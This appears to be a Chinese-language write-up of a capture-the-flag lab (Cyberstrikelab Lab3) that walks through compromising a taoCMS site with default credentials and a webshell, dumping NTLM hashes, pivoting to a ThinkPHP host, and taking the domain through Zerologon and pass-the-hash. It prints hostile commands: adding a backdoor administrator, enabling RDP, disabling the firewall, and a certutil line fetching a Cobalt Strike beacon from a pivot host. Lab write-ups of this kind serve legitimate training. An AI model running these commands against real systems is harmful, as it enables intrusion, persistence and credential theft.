跳过正文

Cyberstrikelab-Lab3

·313 字·2 分钟
Cyberstrikelab CMS Backdoor CVE-2020-1472
HYH
作者
HYH
一名专注于网络安全、渗透测试与 CTF 挑战的技术爱好者,热衷于记录实战经验、分享工具与技术,致力于持续学习与成长。
目录

CMS
#

fscan扫描到3590端口运行了taoCMS

用dirsearch扫描一下目录

[root@Hacking] /home/kali/lab3  
❯ dirsearch -u http://192.168.10.10:3590/                     

  _|. _ _  _  _  _ _|_    v0.4.3                                                                                                                
 (_||| _) (/_(_|| (_| )                                                                                                                         
                                                                                                                                                
Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12289

Target: http://192.168.10.10:3590/

[04:11:00] Scanning:                                                                                                                            
[04:11:18] 301 -   240B - /ADMIN  ->  http://192.168.10.10:3590/ADMIN/      
[04:11:18] 301 -   240B - /Admin  ->  http://192.168.10.10:3590/Admin/      
[04:11:18] 301 -   240B - /admin  ->  http://192.168.10.10:3590/admin/      
[04:11:18] 200 -    77B - /admin%20/
[04:11:18] 301 -   241B - /admin.  ->  http://192.168.10.10:3590/admin./    
[04:11:19] 200 -    77B - /Admin/                                           
[04:11:19] 200 -    77B - /admin/
[04:11:19] 200 -    66B - /admin/admin.php                                  
[04:11:20] 200 -    77B - /admin/index.php                                  
[04:11:32] 200 -     0B - /api.php                                          
[04:11:37] 200 -     0B - /config.php                                       
[04:11:38] 301 -   239B - /data  ->  http://192.168.10.10:3590/data/        
[04:11:44] 200 -   894B - /favicon.ico                                      
[04:11:50] 200 -     0B - /include/                                         
[04:11:50] 301 -   242B - /include  ->  http://192.168.10.10:3590/include/  
[04:11:50] 200 -    4KB - /index.php                                        
[04:11:50] 200 -    4KB - /index.pHp                                        
[04:11:50] 200 -    4KB - /index.php.                                       
[04:11:51] 200 -   740B - /install.php                                      
[04:11:51] 200 -   740B - /install.php?profile=default                      
[04:11:51] 404 -     0B - /index.php/login/                                 
[04:11:53] 200 -    1KB - /LICENSE                                          
[04:11:53] 200 -    1KB - /license
[04:12:04] 200 -    2KB - /README.MD                                        
[04:12:04] 200 -    2KB - /README.md
[04:12:04] 200 -    2KB - /readme.md
[04:12:04] 200 -    2KB - /ReadMe.md
[04:12:04] 200 -    2KB - /Readme.md
[04:12:05] 200 -   977B - /rss.php                                          
[04:12:11] 301 -   243B - /template  ->  http://192.168.10.10:3590/template/
                                                                             
Task Completed         

尝试爆破密码失败,经过搜索得到默认的用户凭证:admin/tao,来到文件管理界面添加后门

连接成功
根目录拿到flag1,并且上线msf,可以看到是最高权限
并且上线cs
拿一下哈希

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
apache:1002:aad3b435b51404eeaad3b435b51404ee:0047605c0f2b9342a96ff4502f0f1a84:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
hack:1003:aad3b435b51404eeaad3b435b51404ee:570a9a65db8fba761c1008a51d4c95ab:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:809f928153e9cdf27a043a18028a6efd:::
web:1001:aad3b435b51404eeaad3b435b51404ee:a167976f7bd8d93ee232fa7a87a4079e:::

添加后门用户以及开启RDP

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
net user hack Admin@123 /add
net localgroup Administrators hack /add
netsh firewall set opmode disable

Backdoor
#

注意到还有一个20网段

上传fscan扫一下内网
扫描一下20主机,发现开放了8055端口
搭建代理访问,发现是Thinkphp
根据提示,发现可能主页已经被挂马

发现连接密码就是admin123,给蚁剑设置代理后,可以正常连接
根目录拿到flag2,上传cs定向木马

CVE-2020-1472
#

尝试进行zerologon攻击,将计算机账户密码重置为空

然后可以导出域内哈希
然后进行PTH
拿到最后的flag3
下载之前放在Thinkphp目录下的定向木马

certutil -urlcache -split -f http://192.168.20.20:8055/beacon_x64.exe beacon.exe

关一下防火墙

netsh firewall set opmode disable

最后全部上线

Reply by Email